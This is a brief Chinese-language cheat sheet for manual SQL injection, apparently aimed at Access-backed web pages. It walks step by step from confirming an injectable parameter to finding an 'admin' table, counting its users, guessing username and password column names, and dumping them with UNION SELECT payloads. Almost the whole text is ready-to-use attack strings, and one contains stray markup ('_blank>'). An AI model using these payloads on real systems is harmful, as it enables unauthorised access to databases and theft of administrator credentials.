1、判断注入存在:
' 存在错误
and 1=1 返回正确
and 1=2 返回错误
2、判断表:
and 0<>(select count(*) from admin)
3、判断用户数目
and n<(select count(*) from admin)
4、猜解字段名称
在len( ) 括号里面加上我们想到的字段名称
and 1=(select count(*) from admin where len(用户字段名称name)>0)
and 1=(select count(*) from admin where len(_blank>密码字段名称password)>0)
5、 判断id值
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
?id=-1 union select 1,2,3,4,5,6,7,8, *,9,10,11,12,13 from admin (union,access也好用)